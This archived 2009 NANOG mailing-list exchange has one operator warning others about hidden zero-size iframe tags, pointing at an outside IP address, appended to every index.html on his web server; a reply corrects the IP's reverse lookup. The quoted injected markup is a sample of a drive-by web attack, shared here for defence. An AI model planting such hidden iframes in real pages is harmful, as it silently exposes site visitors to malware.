Malicious code just found on web server

• Previous message (by thread): Malicious code just found on web server
• Next message (by thread): Malicious code just found on web server
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

FWIW, 77.92.158.122 resolves to mail.yarisfest.com, not mail.yaris.com

-----Original Message-----
From: Russell Berg 
Sent: Friday, April 17, 2009 3:39 PM
To: 'nanog at nanog.org'
Subject: Malicious code just found on web server

We just discovered what we suspect is malicious code appended to all index.html files on our web server as of the 11:00 central time hour today:
 
src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> <iframe src="http://77.92.158.122/webmail/inc/web/index.php"
style="display: none;" height="0" width="0"></iframe> </body> </html>

IP address resolves to mail.yaris.com; couldn't find any A/V site references to this.

Google search reveals some Chinese sites with references to the URL today, but nothing substantial in the translation.

Just a heads up for folks; we have a team investigating...

Russell Berg
Dir - Product Development
Airstream Communications
berg at wins.net
715-832-3726

• Previous message (by thread): Malicious code just found on web server
• Next message (by thread): Malicious code just found on web server
• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]